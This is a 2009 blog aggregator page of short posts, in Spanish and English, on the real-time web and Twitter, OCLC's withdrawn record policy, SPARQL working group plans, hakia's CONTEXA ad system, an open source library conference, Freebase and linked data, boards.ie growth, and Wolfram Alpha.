May 20th, 2009

Tenía ganas de hablaros de ello desde que Pedro Villarubia, educador y buen amigo virtual, me dejaba en Twitter un par de enlaces de interés. Se trata de un concepto que comentábamos hace un tiempo y que está siendo uno de los más relevantes durante 2009: La web en tiempo real.

Diría que la responsabilidad es casi exclusiva de Twitter pero podemos analizar, gracias a lecturas y reflexiones personales un poco más el tema. Así, comenta Nova Spivack que, como decíamos en la Presentación “Web 3.0, La tercera década de la web, el Stream supone un nuevo paso, una nueva metáfora en la evolución de la web.

Internet tiene algunas décadas más que la web. Y aunque hoy identifiquemos ambos términos, no es así:

La web es soportada por Internet como el software a los sistemas operativos de los equipos. Así, lo nuevo ahora sería el  Lifestreaming, llamado más tarde web en tiempo real, Statusfera o lo que ahora Spivack denomina la corriente (The Stream).

Entorno a ello nacen múltiples herramientas, unas que a imagen y semejanza de Twitter, Facebook, Friendfeed, nos permiten dejar huellas inmediatas en la web y otras, derivadas de estas y de tecnologías como las de Sindicación y las más nuevas de open-source real-time technology (XMPP),  permiten cosas como la “Búsqueda en tiempo real”, el filtrado de la información, su organización, seguir “Tendencias” o incluso predecir el futuro.

Incluso si el modelo de datos enlazados subyacente es como un grafo, incluso semántico, la experiencia de usuario será cada vez más orientada al stream.

Así, si la web está formada de sitios, páginas y links, el flujo está formado de corrientes de información, incluso, a través de APIs abiertas, de los datos que tanto importan a la interoperabilidad y coherencia de la web abierta que queremos y representa el gráfico inferior (Linked data web):

linked_data_standards

  • Cambio, ámbitos de conocimiento

Los streams cambian a menudo y eso constituye parte de su valor.  De hecho el cambio es su característica principal.

Eso distingue Streams (microblogging, blogs para Spivack) de otro tipo de web sites, colecciones estáticas de referencia, según, añadiría yo, entre otros factores, el ámbito de conocimiento, más o menos histórico o consensuado por la comunidad científica a que nos estemos refiriendo. Si hablamos de entornos que recogen datos prospectivos, de futuro, o de blogs que recogen informaciones en beta, conversación permanente, entonces el stream adquiere una importancia capital.

  • La web en construcción permanente.

Aquí, la conversación lo es todo, con el RT (Retweets en Twitter) llegando incluso a superar en importancia al enlace como indicador cuantitativo de popularidad de las páginas.

El tema me recuerda en parte a Wolfram Alpha,  definido oficialmente como herramienta de computación de conocimientos concretos, más que como motor de búsqueda. Aunque leáis que puede suponer una alternativa a Google, veréis si lo probáis y analizáis a fondo que se trata de algo muy distinto.

  • Independencia de la Interface, Personalización:

Si en la era de la web era el proveedor el que controlaba la interface desde la que recibíamos los datos. en la nueva era, es el consumidor el que, haciendo uso de distintas herramientas de sistematización, de organización del flujo (lectores de feed, los Entornos personales de los que venimos hablando últimamente, la construye según sus propias necesidades o intereses.

Es una de las características que también destacábamos para la web 3.0 y el aprendizaje en Entornos Personales (Aprendizaje 3.0):

  • Sobrecarga cognitiva:

El tema provoca varias reflexiones. A nivel de e-competencias, si todo es cada vez más  conversacional, menos permanente, un requisito fundamental del flujo será la  sincronicidad en la respuesta. O respondemos de forma  inmediata, o lo hacemos de forma obsoleta, una vuelta de tuerca más al esfuerzo de interactuar con la información o una ubicuidad (telefonía móvil) cada vez más necesaria si no queremos quedarnos fuera de la corriente.

Visto en otros términos, nos dirigimos a un mundo de Inputs momentáneos, atención distribuida y fragmentada,  viralidad efímera, momentos de celebridad, de visibilidad instantánea, que nos llegan a una velocidad inabarcable y que necesitarán,  bien de la evolución rápida de nuestro sistema cognitivo, bien de la importancia absoluta de  filtros que adapten esta nueva conciencia universal a las capacidades cognitivas humanas.

Se me ocurren varias reflexiones al respecto. ¿Alcanzaremos así de forma permanente el estado de Flujo de Mihaly Csikszentmihalyi que había de llevarnos a la felicidad?
¿Deberíamos acotar nuestros intereses? La metáfora de las 10.000 horas necesarias para ser excelentes en cuanto a conocimiento (los Outliers de Malcolm Gladwell) podría ser válida solamente de este modo.  ¿Pero eso no nos limita, no limita la creatividad, la innovación?.  ¿Será la colaboración la única y creciente solución al problema de la inabarcabilidad del conocimiento?

La sobrecarga cognitiva genera dudas, que no sólo nos afectan como humanos. Parece que a la gran compañía monopolista de la red, al propio Google, también le cuesta adaptarse al Stream:

Así, mientras el Gran Hermano de la red (lo digo en tono irónico y exagerado ;) ) no suba al tren de la nueva tendencia, que reconoce oficialmente como una de sus debilidades, son otros quienes protagonizan el movimiento:

  • Nuevas aplicaciones, Publicidad:

También afecta a nuevas formas de publicidad, de rentabilización de espacios: En una red orientada al Stream en la que podemos monitorizar la popularidad de cada cosa en cada momento, surgen nuevas oportunidades de monetización, basadas en precios mayores o rotación de anuncios para impresiones en las páginas más populares “en el momento actual”.

Y a nuevas aplicaciones, nuevas Startup que en 2009 nos ofrecen múltiples formas de gestión del Stream: Notify, Friendfeed, aplicaciones de escritorio o complementos del navegador para interactuar con Twittter o cualquier otro servicio de comunicación basada en el “status”.

  • La mente, el espíritu global de la humanidad:

Difiero en este punto del razonamiento que sitúa internet como nuestro sistema nervioso colectivo, la web como nuestro cerebro (brain) colectivo y el stream como nuestra mente (mind) colectiva.  O prefiero limitarlo al ámbito de la metáfora: El stream estaría representando, a nuestra imagen y semejanza, la mente, lo que el sistema está “pensando” en tiempo real.  Creo que el salto es hoy arriesgado y aún poético cuando se afirma que la inteligencia planetaria podria estar suponiendo cualquier forma de conciencia independiente.

Pero lo que sí parece cierto es que de esa suma de conciencias, de contenidos, de informaciones generadas por milllones de usuarios y bajo el principio de que el todo es superior a la suma de las partes, podría estar emergiendo algo, no sólo más inteligente (como veíamos en Sabiduría de las multitudes) sinó también mucho más vivo y dinámico.

Soñemos….

Relacionados:

Imágenes:

Slide from Tim Berners-Lee’s TED talk in Feb 09

Mcallan, Imaginación al poder.

Compártelo: bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark

Spanish

OCLC Dumps New Record Reuse Policy

May 20th, 2009

Jennifer Younger OCLC logo Jennifer Younger, Chair of the OCLC Review Board of Shared Data Creation & Stewardship announced in a presentation on May 18th [video stream and presentation slides here] that they are to “Formally withdraw the proposed policy

From her presentation:

  • We affirm that a policy is needed, but not this policy
  • Formally withdraw the proposed policy
  • Until a new policy is in place, reaffirm the existence and applicability of the Nov. 16, 1987 “Guidelines for the Use and Transfer of OCLC-Derived Records”

She goes on to explain how they are to move on to “Discuss the role and value of WorldCat in the information ecosystem, and ways in which it can be leveraged” - “Devise a process for drafting and maintaining a new policy” [quotes from slides]

In her speech [from 16 minutes in] she indicated that the process for drawing up a new policy “must involve the governance structure of OCLC – the proposed policy is fundamental to the functioning of OCLC

The development of this policy without sufficient consultation has led some to the conclusion that members are not successfully influencing the directions of the organisation; which in the eyes of some weakens OCLC.  It’s certainly not in our best interest

An announcement, and honest admission of getting it very wrong, that I suspect nobody at OCLC expected to be making only a few short months ago.  It is now up to their membership to influence and help the organisation get these fundamental principles right.

Technorati Tags: ,,

English

SPARQL working group holds 1st face-to-face, decides upcoming features

May 19th, 2009

The SPARQL working group recently held its first two-day face-to-face (F2F) meeting, co-located in Cambridge, MA, USA and in Bristol, UK.

The F2F marked the culmination of the first phase of the group's work, in which members worked to identify potential features to work on in the coming months. On the first day of the F2F, the group resolved to work on a set of six required features and five time-permitting features over the next 15 months or so. These features include long-sought SPARQL capabilities such as aggregates, subqueries, and update, as well as a better approach to negation and a standard way for SPARQL endpoints to describe the capabilities of their service ("service description").

Time-permitting, the group intends to also pursue standardization of the semantics for using SPARQL to query richer entailment regimes such as OWL or RDFS, as well as to consider basic federated query and property paths.

The Working Group also decided that while the whole landscape of language and protocol will continue to be referred to as SPARQL, particular SPARQL languages will also be identified with names such as SPARQL/Query and SPARQL/Update. Others are possible as the group pursues its work.

On the second day of the meeting, group members launched into discussions of potential designs for three features: aggregates, subqueries, and update. The group noted nearly 30 open issues that must be resolved, and gathered nearly 20 actions to help advance towards consensus on these issues. You can follow along as the group continues its work via the SPARQL Working Group's issues & actions tracker.

The SPARQL Working Group will be publishing a document within the next two months that outlines the features and rationale behind the features that the group will be working on. As always, we welcome input on this document and on any other work the Working Group pursues via our public comments list, public-rdf-dawg-comments@w3.org.

English

A New Contextual Advertising Technology from hakia: CONTEXA, launched at ReadWriteWeb

May 19th, 2009

We are happy to announce that we have launched our new contextual advertising module of our semantic advertising system: CONTEXA. ReadWriteWeb (RWW), one of the world’s top 20 most popular blogs according to Technorati, is our first partner.

CONTEXA provides page-level contextual analysis on-the-fly and outputs keywords that represent the meaning of the page along with their meaning score. CONTEXA is offered as a service and can be integrated into any ad system. RWW has integrated CONTEXA where our system matches the contextual representation of a blog page with sponsors’ requirements on-the-fly to provide relevant ads to RWW readers for a richer experience. The red box in the image below shows this step.

rww

We believe that more relevant contextual ads will bring the return of contextual advertising closer to paid-search levels with the ripple-effect of increased CTR- conversion rates- revenue. CONTEXA is powered by hakia’s semantic core technology. To see how CONTEXA works, you can visit our CONTEXA page.

We had shared with our readers the comparison demo of hakia’s contextual capabilities with that of AdSense and Yahoo in the fall. We did not have a chance to do a comparison with Microsoft’s PubCenter. As we move along with the ReadWriteWeb’s implementation of CONTEXA, we will report about lessons learned and milestones marked.

We are excited to keep the wheels of innovation turning at hakia as our industry has plenty room for improvement. Today, Web users are overwhelmed with the quantity and suffer from the quality of display ads and quickly learn to ignore a good portion of the Web pages they visit. In the long run, the industry’s focus will have shift to increasing ad quality and limiting the supply to increase value. The path to this promise goes through enhancements to both contextual and behavioral ad targeting technologies. We are happy to partner with ReadWriteWeb, a kindred-spirited innovator, for the beginning of a journey to provide more relevant contextual ads .

To learn more about CONTEXA, please contact bdev at hakia.com We are more than happy to set you up with a custom demo.

Add new tag, English, News, ReadWriteWeb, Technology, contextual advertising, hakia, semantic advertising

Breaking the Open Source Barriers 2009

May 18th, 2009

openlibraries I seem to be spending lots of time on trains recently.  This time I’m on my way back from the OpenLibraries Open Source Breaking the Barriers 2009 conference held at RIBA in London.

Jointly organised by Ken Chad Consulting and PTFS Europe, this was an interesting day, although I think it would have been better titled the Open Source in Libraries Conference, but that’s probably just me.

The UK library world hasn’t really stepped on the Open Source ILS/LMS band-wagon yet.  At most, interest so far has been of the ‘watching developments across the Atlantic’ type.  So for many, today was the first chance to think about it in a conference setting.  The day was kicked off by a thought provoking Charles Leadbeater who set open source in context with other trends in the web and social spaces.  Conference organiser Ken Chad was about to launch in to his presentation when he was rudely interrupted by a fire alarm.  Six flights of stairs later, we all convened in the street for 15 minutes whilst the cause of the false alarm was tracked down by the fire brigade.  Luckily this unscheduled networking opportunity took place in the sunshine – an hour later and we would have all been drenched.

What felt like far more than six stair flights were then scaled, with Ken’s thoughts on the value that an Open Source approach can provide to our sector, as a reward.

Bob Molyneux of Equinox and Mike Taylor of Index Data gave some different views from companies successfully delivering, and building a business out of, Open Source software.  Bob detailed how much their Evergreen system had developed since its initial deployment for Georgia PINES.  Mike reminded us that many proprietary systems, Talis’ included, use Index Data Open Source components.

They were followed by BibLibre’s Paul Poulain who took us through SOPAC (the subject of a Talking with Talis Podcast with it’s developer and Library 2.0 Gang member, John Blyberg) and how he was linking it with Koha.

Representative of the co-organisers, Nick Dimant then took us through how PTFS Europe, an established company in other associated areas, could support libraries whishing to contemplate either an Evergreen or Koha installation.  He painted a stark picture of what it was like in a proprietary system vendor, short on funds to invest in their products, unable to innovate, cutting back on support where sleeping cats answered the phones.  Although entertaining, and possibly based on experience in some organisations, it was not a picture I recognise from within Talis. 

Mark  Hughes and Paul Johnson of Swansea University later described the why’s when’s and how’s of the choice and implementation (still in progress) of a VuFind based OPAC for the three university consortium in South Wales – SWWHEP.  They were followed by Strathclyde University lecturer, Alan Poulter who described how he used multiple copies of Koha to give students, on his MSc Digital Libraries module, experience of a using a real library system – from creating borrowers  and library rules to cataloguing in Marc.

The last section of the day, described by Ken as the view from the proprietary systems vendors, consisted of Ex Libris’  Director of Marketing, Tamar Sadeh, and myself.

Tamar talked through the Ex Libris open-platform program, (the subject of another Talking with Talis podcast) explaining how openly sharing the documentation of their APIs with their customers, stimulates innovation that can then be shared in that community.  The code being hosted by Ex Libris under the licence of choice from the developer.   Of course most of us in the audience, not being Ex Libris customers with logins to the Ex Libris site, only have her presented screen shots to support her descriptions.  We will have to wait for Ex Libris to open up this open site before we can browse the innovations she was extolling.

It was left to me to bring the presentations to a close with 20 minutes worth on Open Source projects, Jangle and JuiceMy slides are on SlideShare, where you can see the overview I gave of why Jangle in providing a consistent Web Standards based way of connecting to Open Source and Proprietary Library Systems, will enable and stimulate innovation.  I took advantage of one of the better conference wifi connections to demonstrate the power of Juice Project extensions adding to the user experience of Talis Prism, VuFind and discovery interfaces.

Overall a very good, well attended, with something for everyone, day.

English

Metaweb´s Jamie Taylor: “Freebase provides a large and user extensible vocabulary for RDF/RDFa”

May 18th, 2009
Jamie Taylor, Metaweb

Jamie Taylor, Metaweb

Andreas Blumauer from Semantic Web Company (SWC) talked with Jamie Taylor, Minister of Information at Metaweb Technologies Inc. about Freebase & Linked Data and Google´s announcement to use RDFa.

SWC: At ISWC 2008 Freebase became “officially” part of the LOD Cloud. What exactly has changed since that time?

Jamie: Since Freebase is a community writable semantic database, the addition of the RDF interface allows anyone to publish data into the LOD cloud. LOD Applications can access any Freebase Topic through the RDF interface by constructing a URI from the Freebase identifier.  But perhaps more importantly, because entities in Freebase can be annotated with multiple identifiers, Freebase Topics can be retrieved by constructed URIs using the identifiers used by other systems and data sets.
For instance, the movie Blade Runner can be referred to as http://rdf.freebase.com/ns/en.blade_runner, but it can also be referenced as http://rdf.freebase.com/ns/authority.netflix.movie.70053131 using the Netflix identifier, http://rdf.freebase.com/ns/authority.imdb.title.tt0083658 using the IMDB identifier, or as http://rdf.freebase.com/ns/wikipedia.en.Dangerous_Days using a Wikipedia wikiword (which in this case is a Wikipedia redirect to the wikiword Blade_Runner).
Freebase also provides a user maintained mapping of how these identifiers can be used to address resources in other LOD systems. The sameas.freebase.com schema can tell an LOD user that the Freebase Blade Runner Topic can also be found in DBpedia using Wikipedia identifiers or how musical artists can be found at the BBC using Musicbrainz identifiers.  In fact, the Freebase RDF interface uses the sameas.freebase.com schema to create the owl:sameAs links in the RDF output allowing the user community to expand the interconnections between Freebase and the LOD Cloud.
Linked Data providers are also using the strong identifiers in Freebase to identify entities such as companies and locations in their own data sets.  When they find an entity that is not represented in Freebase, they simply add the entity to Freebase and use the newly minted Freebase identifier.  This permits anyone using their data to understand how their entities relates to any of the more than 5 million things interconnected within Freebase.

The RDF interface can also be used to reference the Freebase type system, giving LOD data set providers vocabularies across a wide range of subject areas.  And because anyone can expand Freebase’s data model, data providers can use our schema development tools to build and extend these vocabularies to suite their needs.
Freebase was not designed for ephemeral or fast changing data, like weather conditions or stock ticks.  But this type of information is well suited for publication as Linked Data.  Freebase entities representing a location or company can be annotated with references to LOD services that provide these types of volatile data.  Similarly, Linked Data provides a great way to disseminate very fined grained information that might be associated with a scientific study or financial report.  Linked Data provides a seemless transition from Freebase, where a user (or application) can run a query with constraints that run across a wide range of types to find entities of interest along with the LOD services that provide access to temporal or high resolution data not available in Freebase.
We recently demonstrated MQL Extensions which allows the Metaweb Query Language to use data from other systems as a part of the query constraint and result set.  While MQL Extensions are user extensible and work with a wide array of systems,  this capability makes the connection between Freebase and the LOD Cloud even more transparent.
For example, because US companies that are registered with the SEC are annotated CIK code in Freebase and the sameas.freebase.com schema indicates that the CIK annotation can be used to create a URI that is dereferencable at rdfabout.com, it is possible to write a MQL query that asks who is on the board of financial services companies that trade on NASDAQ and are  headquartered in California (and using another MQL Extension, you can ask for their stock price as well!)

SWC: Many organisations are very interested in Linking Open Data now but they are still not sure if they can benefit from publishing data on the web - what´s your experience so far?

Jamie: Linked Open Data provides a simple, standard way for organizations to distribute structured data.  For most organizations, providing access to data is another important outlet to announce the availability of higher value services.  For organizations involved in building or selling physical goods, the bits representing what they provide are not the goods themselves, but a way of attracting potential customers.  Making catalogs and specification sheets available in electronic form, so other applications can connect buyers to their physical goods is simply an effective marketing system.  Even for firms involved in electronic services, providing access to open structured data is generally a lead-in to value added services.  For instance, if I ran a service collecting hard-to-find information about manufacturing relationships between medium sized businesses, I would publish open company profiles covering things like market size, industry, location for the medium-sized businesses I tracked, so potential users the premium data would know I had the coverage they were looking for.

SWC: Just recently Google has announced to use RDFa to enhance their search results. What do you think?

Jamie: We are excited about Google’s announcement. Yahoo’s use of RDFa for Search Monkey and Google’s announcement gives RDFa users tangible benefits. The Search Monkey team was very quick to realize that because users can create data models in Freebase, and because the elements of those models all have strong RDF identifiers, Freebase provides a large and user extensible vocabulary for RDF/RDFa (see the list of vocabularies). When a user wants to create a Search Monkey application that works with their film review site, they need not invent a new vocabulary (that will probably be used only once),  they can use the Freebase Film Domain vocabulary which supports over 63,000 instances in Freebase alone.
Similarly, with over 5 Million well described Topics in Freebase and over 14,000,000 Named Objects (Topics, images, musical tracks and documents) when a user wants to unambiguously identify a subject or object in RDF/RDFa, Freebase has an extremely large collection of identifiers to draw from.  These cover people, places, companies, movies, music, books and wide variety of other subjects.  If Freebase doesn’t have the entity the user is looking for, they can of course add it themselves and make use of the identifier immediately. I think this is why Google used some Freebase identifiers in their examples. We hope that with Yahoo and Google’s support for RDFa the web will become a strongly annotated source of data which can support a wide range of user applications.

SWC: Thank you, Jamie!

Reblog this post [with Zemanta]

English

Growth of boards.ie users / posts / threads continues

May 18th, 2009

I’ve re-run our statistics gathering queries, and produced three new graphs showing boards.ie’s growth in terms of users, posts and threads during the period February 1998 to April 2009 (here are the previous set of graphs from August 2007).

User growth

20090518a

Post growth

20090518b

Thread growth

20090518c

Reblog this post [with Zemanta]

Boards, English, Ireland

Elsevier Oopsie

May 17th, 2009

Wolfram Alpha ya. Y puede ser útil

May 16th, 2009

Os resultará extraño que no hayamos hablado antes del nuevo “Google Killer”. Son ya muchas las ocasiones en las que alguna aplicación se ha servido de ese “buzz” (ruido) como para creerlo ya. Además, en este caso, creo que siguiendo los usos de la publicidad tradicional, han generado expectativas desde hace tiempo.

No habíamos hablado de ello aquí pero sí lo he hecho en algunas presentaciones:

“Creo que el buscador se dedica a cosas distintas, que puede ser complementario y no amenazar el monopolio de Google.

Ya existen buscadores semánticos similares en cuanto a funcionamiento (True Knowledge y Powerset)”

Así lo confirman desde RWW, tras anunciar hoy está disponible:

-No es un buscador general.
-No compite con Google en su punto fuerte fundamental: la sencillez de uso. En este caso requiere de un proceso de aprendizaje importante.

Nos dejan algunos consejos para obtener resultados:

  • Probar distintas formas de decir lo mismo, incluso distintas combinaciones de mayúsculas-minúsculas pueden marcar la diferencia.
  • Probar con búsquedas que puedan estar en ámbitos conceptuales cerrados (altura de una montaña, fórmulas químicas, estadísticas de población, planetas, etc…) .
  • Probar combinación de dos búsquedas. Funciona bien en eso.
  • Trabaja bien con problemas matemáticos, comidas, medicamentos, etc…

En fin… que la versión oficial nos cuenta que ni siquiera pretenden ser un motor de búsqueda sinó un “motor de conocimiento computacional” (computational knowledge engine), útil en algunos casos para encontrar información concreta que hoy teníamos en wikipedia pero sin amenazar en ningún caso ni a esta ni al todopoderoso Google.

Vale la pena probarlo si queréis datos exactos sobre materias concretas: sigo en el EABE09, y aconsejaría a los compañeros de educación su testeo exhaustivo en sus respectivas materias. Creo que puede ser bastante útil en investigación y enseñanza. Probad los cómputos, problemas  predefinidos que ellos mismos proponen en la sección de Ejemplos.

Os dejo un experimento curioso: Mi edad exacta. Tengo 13720 días. Qué mayor estoy….;)

october-23-1971-wolfram-alpha_1242459804196

Compártelo: bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark bookmark

Spanish